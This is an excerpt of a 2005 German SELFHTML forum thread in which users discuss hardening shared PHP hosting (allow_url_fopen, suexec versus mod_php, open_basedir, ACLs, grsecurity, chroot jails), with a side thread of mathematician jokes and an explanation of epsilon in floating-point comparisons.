Stelle der<br> Fragezeichen stehen müsste ;-)</p> </blockquote> <p>Installiere dir entsprechende Schriften :)</p> <blockquote> <blockquote> <blockquote> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP.</p> </blockquote> <p>Die da wäre?</p> </blockquote> <p>Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> </blockquote> <p>So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr<br> einfach Dateien von einem auf den anderen Server zu übertragen.</p> </blockquote> <p>Und es wäre schwerer, wenn man eine eigene Funktionsgruppe dazu einführt?<br> Ne, sorry, aber das will mir nicht einleuchten, das halte ich für groben<br> Unfug.</p> <blockquote> <blockquote> <p>Einmal nicht aufgepasst und schon machts krach-bumm.</p> </blockquote> <p>Eigentlich ist das Problem dasselbe wie lokal (ohne allow_url_fopen),<br> mit dem kleinen aber feinen Unterschied, dass die Auswirkungen erheblich<br> verheerender sind.</p> </blockquote> <p>Richtig. Wie ich bereits sagte: Risiko-Faktoren minimieren.</p> <blockquote> <blockquote> <blockquote> <p>IMHO sollten User nur Prozesse unter eigener UID laufen lassen können<br> (suexec/suphp für CGI),</p> </blockquote> <p>Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur<br> (normalerweise installierten) Modul-Version aufweist.</p> </blockquote> <p>Die Unterschiede sind doch wohl marginal.</p> </blockquote> <p>Aber vorhanden.</p> <blockquote> <p>Ich finde den Gedanken gut dass User nicht Daten anderer User<br> manipulieren können,</p> </blockquote> <p>Das geht bei uns auch nicht :) open_basedir ist pro vhost gesetzt.</p> <blockquote> <blockquote> <p>Da hilft nur eine vernünftige Administration,<br> der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.</p> </blockquote> <p>Er hat es immerhin geschafft dass der Webserver offline war.</p> </blockquote> <p>“Und das ist auch gut so”[tm] ;-)</p> <blockquote> <p>Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff,<br> könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO<br> sollte eine gute Konfiguration sowas vermeiden!</p> </blockquote> <p>Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht vermeidbar.<br> Nicht wgen der Technik, sondern wegen der User. “Geht nicht? Access<br> denied? Arg! *chmod 777*”.</p> <blockquote> <p>Was ich bisher aber nicht wüßte wie ich es vermeide, ist es z.B.<br> DB-Zugangsdaten in Scripten (anderer Kunden) vor so einem Angreifer zu<br> schützen. Solange der Webserver diese Zugangsdaten lesen kann, kann der<br> Angreifer das auch.</p> </blockquote> <p>Naja, nicht wirklich. Wenn man mit suexec arbeitet, kann man das Problem<br> schon weitestgehend umgehen.</p> <blockquote> <p>Man kann zwar ein Directory-Listing verhindern, dass er nicht sofort<br> sieht wo die anderen Kundendaten liegen, aber darauf würde ich mich<br> jetzt eher nicht verlassen wollen. Man kann auch verhindern dass er in<br> der Shell auf andere Kunden-Verzeichnisse zugreift - aber kann man auch<br> verhindern dass er mit dem Apachen zugreift?</p> </blockquote> <p>Jop. Siehe suexec ;-)</p> <blockquote> <p>Ich meine - angenommen ich kenne das Verzeichnis anderer Kunden, was hält<br> mich davon ab per .htaccess und z.B. Alias mal ein bisschen in den<br> Verzeichnissen zu stöbern, und mit Dateien dort als text/plain ausliefern<br> zu lassen?</p> </blockquote> <p>Auf Passwort-Dateien braucht der Apache bei suexec keinen Zugriff. Warum<br> auch? Man greift ja mit Benutzer-Rechten zu.</p> <blockquote> <blockquote> <p>Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann<br> man da sehr viel recht schön einschränken.</p> </blockquote> <p>OK, ACLs, sicher nicht verkehrt. Ich verwende noch das<br> <a href="http://grsecurity.net/" rel="nofollow noopener noreferrer">grsec-patch</a> (proaktive Sicherheit<br> gegen gewissen Angriffe, PAX...), gibts bei Gentoo als grsec-sources.<br> Hat den Vortei, dass einige Exploits (nicht alle) auf so einem System<br> nicht funktionieren.</p> </blockquote> <p>Jo, grsec ist nicht verkehrt.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Q: God, root, what's the difference?<br> A: God is merciful.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821353#m821353 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T12:51:30Z 2005-06-10T12:51:30Z Haltet eure PHP-Software aktuell! <p>Hallo!</p> <blockquote> <p>Installiere dir entsprechende Schriften :)</p> </blockquote> <p>Da hilft wohl nur ein "recherchiere diese bitte im </archiv/>" ;-)</p> <blockquote> <blockquote> <blockquote> <p>Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> </blockquote> <p>So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr<br> einfach Dateien von einem auf den anderen Server zu übertragen.</p> </blockquote> <p>Und es wäre schwerer, wenn man eine eigene Funktionsgruppe dazu einführt?<br> Ne, sorry, aber das will mir nicht einleuchten, das halte ich für groben<br> Unfug.</p> </blockquote> <p>Naja, zumindest bei include() halte ich es auch für groben Unfung. Wozu sollte man PHP-Scripte über das Web einbinden wollen? Und wenn man das schon will dann soll man doch bitte sowas wie eval(file_get_contents()) verwenden, das sieht wenigstens auch der Ober-DAU dass man das nicht unbedingt immer so machen sollte. Leider funktioniert das AFAIK nicht 1:1...</p> <p>Allerdings sieht es so aus, als würde die HTTP-Extension doch nicht aufgenommen ("keine neuen spezialisierten Extensions...").</p> <blockquote> <blockquote> <blockquote> <p>Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur<br> (normalerweise installierten) Modul-Version aufweist.</p> </blockquote> <p>Die Unterschiede sind doch wohl marginal.</p> </blockquote> <p>Aber vorhanden.</p> </blockquote> <p>Was die großen Hoster aber wohl nicht stört.</p> <blockquote> <blockquote> <p>Ich finde den Gedanken gut dass User nicht Daten anderer User<br> manipulieren können,</p> </blockquote> <p>Das geht bei uns auch nicht :) open_basedir ist pro vhost gesetzt.</p> </blockquote> <p>Hilft aber nicht gegen eine Perl-Shell *g*</p> <p>Und seit wann vertraust Du auf open_basedir? OK, Risikominimierung, naja.</p> <blockquote> <blockquote> <p>Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff,<br> könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO<br> sollte eine gute Konfiguration sowas vermeiden!</p> </blockquote> <p>Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht vermeidbar.<br> Nicht wgen der Technik, sondern wegen der User. “Geht nicht? Access<br> denied? Arg! *chmod 777*”.</p> </blockquote> <p>Ja, aber das Problem gibt es auch nur wegen mod_php, weil alle unter einem User laufen. Bei suexec kannst Du strengere Rechte setzen, evtl. auch eine hübsche umask ;-)</p> <p>Bei suexec kannst Du folgende Rechte verwenden:</p> <p>HTML, Bilder, CSS...: 640<br> Verzeichnisse: 710<br> Perl-Skripte: 700<br> PHP-Skripte/Includes: 600</p> <p>Bei mod_php geht das schlicht und ergreifend nicht. Bei suexec habe ich es wenigstens selber in der Hand meine Passwort-Datei mit entsprechend restriktiven Rechten zu versehen!</p> <blockquote> <p>Auf Passwort-Dateien braucht der Apache bei suexec keinen Zugriff. Warum<br> auch? Man greift ja mit Benutzer-Rechten zu.</p> </blockquote> <p>Stimmt.</p> <p>Viele Grüße<br> Andreas</p> <p>PS: bei der Fehlermeldung "generalverweis gepostet" vergisst er irgendwie Themenbereich und Thema in der Vorschau einzufügen</p> <div class="signature">-- <br> SELFHTML Linkverzeichnis: <a href="http://aktuell.de.selfhtml.org/links/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/links/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821356#m821356 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T13:11:51Z 2005-06-10T13:11:51Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <p>Und seit wann vertraust Du auf open_basedir?</p> </blockquote> <p>Vertrauen? Tue ich nicht :)</p> <blockquote> <blockquote> <blockquote> <p>Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden<br> Zugriff, könnte alle DB-Zugangsdaten auslesen und wer weiß was noch<br> alles. IMHO sollte eine gute Konfiguration sowas vermeiden!</p> </blockquote> <p>Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht<br> vermeidbar. Nicht wgen der Technik, sondern wegen der User. “Geht<br> nicht? Access denied? Arg! *chmod 777*”.</p> </blockquote> <p>Ja, aber das Problem gibt es auch nur wegen mod_php, weil alle unter<br> einem User laufen.</p> </blockquote> <p>Nein, das Problem gibt es immer bei unbedarften Usern.</p> <blockquote> <p>Bei mod_php geht das schlicht und ergreifend nicht.</p> </blockquote> <p>Doch -- aber dann musst du ACLs setzen ;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821354#m821354 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T16:07:44Z 2005-06-10T16:07:44Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <p>am sichersten wäre es eh, wenn man für jeden Benutzer eine eigene<br> Apache-Instanz in einem BSD-Jail oder einen Linux-chroot aufsetzt, die nur<br> intern auf Port <irgendwas> lauschen. Die Requests leitet man dann z. B. per<br> Squid an den richtigen internen Port weiter. So kann quasi nichts<br> passieren, selbst wenn ein Kunde gehackt wird ;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Der Verstand steht ueber allem. Was durch die Vorstellungskraft nicht geschaffen werden kann, existiert nicht.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821355#m821355 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T16:48:20Z 2005-06-10T16:48:20Z Haltet eure PHP-Software aktuell! <p>Hallo Christian!</p> <blockquote> <p>am sichersten wäre es eh, wenn man für jeden Benutzer eine eigene<br> Apache-Instanz in einem BSD-Jail oder einen Linux-chroot aufsetzt, die nur<br> intern auf Port <irgendwas> lauschen.</p> </blockquote> <p>abgesehen von <a href="http://www.google.com/search?q=How+to+break+out+of+a+chroot+jail" rel="nofollow noopener noreferrer">http://www.google.com/search?q=How+to+break+out+of+a+chroot+jail</a> - ja (also FreeBSD Jail oder Linux mit grsec), aber das wollte ich dann nicht warten müssen ;-)</p> <blockquote> <p>Die Requests leitet man dann z. B. per<br> Squid an den richtigen internen Port weiter. So kann quasi nichts<br> passieren, selbst wenn ein Kunde gehackt wird ;-)</p> </blockquote> <p>Aber da die großen Provider IMHO gut damit fahren ein einfaches System streng zu konfigurieren, würde ich eher diesen Weg gehen wollen.</p> <p>Wenn ein Kunde die Möglichkeit hat Passwort-Datein für andere nicht sichtbar zu speichern, ist er selbst Schuld wenn er das nicht macht. Von der Konfiguration sollte das System nur so ausgelegt sein, dass wenn ein Angreifer irgendeinen Account knackt, also entsprechende User-Rechte hat, dass er an dieser Stelle nicht weiter kommen darf, also auch keine anderen Accounts (mit ordentlichen Rechten) verändern/lesen können darf. Dasselbe gilt natürlich noch viel mehr für Daten bzgl. Administration, da lassen manche ja auch schonmal das root-passwort für MySQL mehr oder weniger öffentlich rumliegen, z.B. in confixx oder in irgendeinem "unwichtigen" Backup...</p> <p>Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Linkverzeichnis: <a href="http://aktuell.de.selfhtml.org/links/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/links/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821357#m821357 Der Martin self@kennst.net 2005-06-10T13:30:03Z 2005-06-10T13:30:03Z Vektorwitze? <p>Hallo Christian,</p> <p>wo hast du eigentlich die diversen Vektor- und sonstigen Mathematik-Witze her? Gibt's da irgendwo eine Sammlung, oder muss man sich die selbst jahrelang sammeln?</p> <blockquote> <p>Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"</p> </blockquote> <p>Ich erinnere mich noch an einen ähnlichen, den ich hier vor einiger Zeit gelesen habe:</p> <blockquote> <p>Kommt ein Vektor zur Suchtberatungsstelle: "Ich bin linear abhängig!"</p> </blockquote> <p>Und bestimmt hast du noch eine Menge mehr davon auf der Pfanne?</p> <p>Ciao & schönes Wochenende,</p> <p>Martin</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821358#m821358 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T13:54:18Z 2005-06-10T13:54:18Z Vektorwitze? <p>你好 Martin,</p> <blockquote> <p>wo hast du eigentlich die diversen Vektor- und sonstigen Mathematik-Witze<br> her?</p> </blockquote> <p>Gesammelt ;-)</p> <blockquote> <p>Gibt's da irgendwo eine Sammlung, [...]</p> </blockquote> <p>Ich bin mir sicher, die gibt es. “Mathematiker-Witze” wäre ein<br> Google-Stichwort... ;-)</p> <blockquote> <blockquote> <p>Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin<br> orientierungslos!"</p> </blockquote> <p>Ich erinnere mich noch an einen ähnlichen, den ich hier vor einiger Zeit<br> gelesen habe:</p> <blockquote> <p>Kommt ein Vektor zur Suchtberatungsstelle: "Ich bin linear abhängig!"</p> </blockquote> </blockquote> <p>Ja, der ist auch in meiner Signatur-Datei *g*</p> <blockquote> <p>Und bestimmt hast du noch eine Menge mehr davon auf der Pfanne?</p> </blockquote> <p>Das hier sind alle, die ich gesammelt hab:</p> <ul> <li>Kommt ein Vektor zur Drogenberatung: "Hilfe, ich bin linear abhaengig!"</li> <li>Sei ε kleiner Null.</li> <li>Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"</li> <li>Treffen sich zwei Geraden. Sagt die eine: "Beim nächsten Mal gibst du einen aus."</li> <li>Die Summe zweier gerader Primzahlen ist immer eine Quadratzahl.</li> <li>1 + 1 = 3 für gosse Werte von 1.</li> <li>73.255437% der Statistiken spielen eine Genauigkeit vor, die durch die angewandte Methode nicht gerechtfertigt wird.</li> <li>89,7% aller Statistiken sind frei erfunden!</li> <li>Mensch zu Mathematiker: "Ich finde Ihre Arbeit ziemlich monoton". Mathematiker: "Mag sein! Dafür ist sie aber stetig und unbeschränkt."</li> <li>lim(3->4)(sqrt(3)) = 2</li> </ul> <p>;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Der Geist ist alles. Du wirst, was du denkst.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821359#m821359 Der Martin self@kennst.net 2005-06-11T08:13:47Z 2005-06-11T08:13:47Z Vektorwitze? <p>Hallo,</p> <blockquote> <p>Gesammelt ;-)</p> </blockquote> <p>ja danke, das war mir eigentlich fast klar...</p> <blockquote> <p>Ich bin mir sicher, die gibt es. “Mathematiker-Witze” wäre ein<br> Google-Stichwort... ;-)</p> </blockquote> <p>Hab ich inzwischen auch probiert, und bin reichlich fündig geworden. Auch einige der von dir gelegentlich zitierten waren unter den Fundstellen.<br> Ich hatte mir nur gedacht, ich frag erstmal bei der vermeintlichen Quelle nach. :)</p> <p>Allerdings sind hier und da immer wieder ein paar Witze dabei, die ich (möglicherweise mangels mathematischen Enthusiasmus) irgendwie nicht verstehe. Was ein Lemma ist, kriege ich bestimmt noch raus, aber hier:</p> <blockquote> <ul> <li>Sei ε kleiner Null.</li> </ul> </blockquote> <p>steh ich irgendwie im Regen. Der taucht öfters auf. Epsilon kleiner Null - ja und? Wo ist da die Stelle zum Lachen? Fehlt mir da ein Stück Wissen oder denke ich mal wieder zu kompliziert?</p> <p>So long,</p> <p>Martin</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821360#m821360 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-11T08:19:42Z 2005-06-11T08:19:42Z Vektorwitze? <p>你好 Der,</p> <blockquote> <blockquote> <ul> <li>Sei ε kleiner Null.</li> </ul> </blockquote> <p>steh ich irgendwie im Regen. Der taucht öfters auf. Epsilon kleiner Null -<br> ja und? Wo ist da die Stelle zum Lachen? Fehlt mir da ein Stück Wissen oder<br> denke ich mal wieder zu kompliziert?</p> </blockquote> <p>Mit ε (Epsilon) wird die Genauigkeits-Differenz bezeichnet. Du weisst ja,<br> dass Fliesskommazahlen bei Computern gemäß ihrer Natur nur begrenzt genau<br> sind. Deshalb macht man seltenst Vergleiche über ==, sondern etwa so:</p> <p>Zwei Zahlen sind gleich, wenn |(a-b)| < ε</p> <p>ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man eine<br> Genauigkeit besser als 100%... *g*</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Q: God, root, what's the difference?<br> A: God is merciful.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821362#m821362 MudGuard http://www.andreas-waechter.de/ 2005-06-11T09:08:43Z 2005-06-11T09:08:43Z Vektorwitze? <p>Hi,</p> <blockquote> <p>Zwei Zahlen sind gleich, wenn |(a-b)| < ε<br> ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man eine<br> Genauigkeit besser als 100%... *g*</p> </blockquote> <p>Nein, eine Ungleichung, die für alle Werte von a und b immer unwahr ist, da der Betrag |x| für jedes x per Definition immer größer als oder gleich Null ist, also niemals kleiner als eine Zahl sein kann, die kleiner als Null sein soll.</p> <p>cu,<br> Andreas</p> <div class="signature">-- <br> <a href="http://www.Mud-Guard.de/" rel="nofollow noopener noreferrer">Warum nennt sich Andreas hier MudGuard?</a><br> <a href="http://www.schreinerei-waechter.de/" rel="nofollow noopener noreferrer">Schreinerei Waechter</a><br> Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.<br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821361#m821361 Der Martin self@kennst.net 2005-06-11T19:58:23Z 2005-06-11T19:58:23Z Vektorwitze? <p>n'Abend!</p> <blockquote> <p>Mit ε (Epsilon) wird die Genauigkeits-Differenz bezeichnet.</p> </blockquote> <p>Ach so. Diese spezielle Bedeutung von ε war mir bisher nicht geläufig. Ich konnte es nur als eine willkürlich gewählte Unbekannte einordnen, die genausogut u oder σ hätte heißen können.<br> Danke für den Tip. :)</p> <blockquote> <p>Du weisst ja, dass Fliesskommazahlen bei Computern gemäß ihrer Natur nur begrenzt genau sind. Deshalb macht man seltenst Vergleiche über ==, sondern etwa so...</p> </blockquote> <p>Ja, das ist mir nur zu gut vertraut; ich habe sogar selbst schon Fließkomma-Arithmetik in Assembler auf einem µC programmiert.</p> <blockquote> <p>Und wenn ε kleiner Null ist, hätte man eine Genauigkeit besser als 100%... *g*</p> </blockquote> <p>Das erinnert mich jetzt irgendwie an eine Mathestunde in der Oberstufe. Vektorrechnung, Gleichung eines Kreises bzw. einer Kugel. Durch ein Versehen unseres Lehrers beim Zusammenstellen der Übungsaufgaben ergab sich bei der Rechnung ein negativer Kugelradius.<br> Schüler: So'n Quatsch, was soll denn das sein, eine Kugel mit negativem Radius!<br> Lehrer, schlagfertig: Das müssen Sie sich so vorstellen, als sei die Kugel einfach nach innen gestülpt, wie wenn Sie Ihr T-Shirt auf links ziehen!  *g*</p> <p>Bis denne,</p> <p>Martin</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821363#m821363 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-11T09:10:26Z 2005-06-11T09:10:26Z Vektorwitze? <p>你好 MudGuard,</p> <blockquote> <blockquote> <p>Zwei Zahlen sind gleich, wenn |(a-b)| < ε<br> ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man<br> eine Genauigkeit besser als 100%... *g*</p> </blockquote> <p>Nein, eine Ungleichung, die für alle Werte von a und b immer unwahr ist, da<br> der Betrag |x| für jedes x per Definition immer größer als oder gleich Null<br> ist, also niemals kleiner als eine Zahl sein kann, die kleiner als Null<br> sein soll.</p> </blockquote> <p>Jupp, das ist ein anderer Aspekt. Ich finde aber die Genauigkeit > 100%<br> lustiger ;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Mensch zu Mathematiker: "Ich finde Ihre Arbeit ziemlich monoton". Mathematiker: "Mag sein! Dafür ist sie aber stetig und unbeschränkt."<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821366#m821366 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T10:19:24Z 2005-06-10T10:19:24Z Haltet eure PHP-Software aktuell! <p>你好 TomIRL,</p> <blockquote> <blockquote> <p>Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen<br> nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf<br> externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme<br> gleich erschlagen.</p> </blockquote> <p>Hm darüber hab ich mir ehrlich gesagt noch keine Gedanken gemacht.<br> Du meinst also wenn man eine Funktion, die ausschliesslich "Text" einliest<br> und alle anderen Sachen draußen läßt?</p> </blockquote> <p>Richtig, vor allem sollte sie nicht ungefragt externe Ressourcen anfordern.<br> Ich finde es ziemlich hirnverbrannt, wenn ich mit fopen() (_File_ open) einen<br> HTTP-Request machen kann. Das lädt doch geradezu dazu ein, Unfug zu machen.<br> Dazu sollte es Extra-Funktionen geben...</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Ich bewundere wirklich den Sinn der Bienen für kollektive Verantwortung. Obwohl sich einzelne Bienen hin und wieder bekämpfen, herrscht zwischen Ihnen grundsätzlich ein starkes Gefühl für Eintracht und Zusammenarbeit. Wir Menschen gelten als sehr viel weiter entwickelt, doch mitunter rangieren wir sogar hinter kleinen Insekten.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821367#m821367 Senti 2005-06-10T10:30:44Z 2005-06-10T10:30:44Z Haltet eure PHP-Software aktuell! <p>Tach auch,</p> <blockquote> <p>Richtig, vor allem sollte sie nicht ungefragt externe Ressourcen anfordern.<br> Ich finde es ziemlich hirnverbrannt, wenn ich mit fopen() (_File_ open) einen<br> HTTP-Request machen kann. Das lädt doch geradezu dazu ein, Unfug zu machen.<br> Dazu sollte es Extra-Funktionen geben...</p> </blockquote> <p>Für externe Zugriffe nutze ich z.B. die CURL funktionen.</p> <p>MfG</p> <div class="signature">-- <br> ie:{ fl:( br:^ va:) ls:[ fo:| rl:? n4:( ss:) de:] js:( ch:? sh:) mo:| zu:) </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821369#m821369 TomIRL http://thomas.giesau.com 2005-06-10T08:54:35Z 2005-06-10T08:54:35Z Sarkasmus <p>Moin,</p> <blockquote> <p>Hallo CK,</p> <blockquote> <p>Dein Sarkasmus ist fehl am Platze.</p> </blockquote> <p>ich habe manchmal den Eindruck, dass TomIRL der <ironie>einzige Forumsteilnehmer mit entsprechendem Wissen</ironie> ist (vgl. <a href="https://forum.selfhtml.org/?t=109215&m=681884" rel="noopener noreferrer">ein Auszug</a>). Zumindest an seinen Formulierungen sollte er "feilen".</p> </blockquote> <p>Oh danke..<br> Meine Mailadresse kennst Du?<br> Wenn Du mit mir ein Problem haben solltest darfst Du mir das gern per mail schreiben.</p> <p>TomIRL</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821370#m821370 at 2005-06-15T10:54:27Z 2005-06-15T10:54:27Z Sarkasmus <p>Hallo.</p> <blockquote> <p>Wenn Du mit mir ein Problem haben solltest darfst Du mir das gern per mail schreiben.</p> </blockquote> <p>Wenn die Reaktion die gleiche ist wie die auf per Kontaktformular an dich gerichtete Anmerkungen, kann man sich das aber auch sparen.<br> MfG, at</p>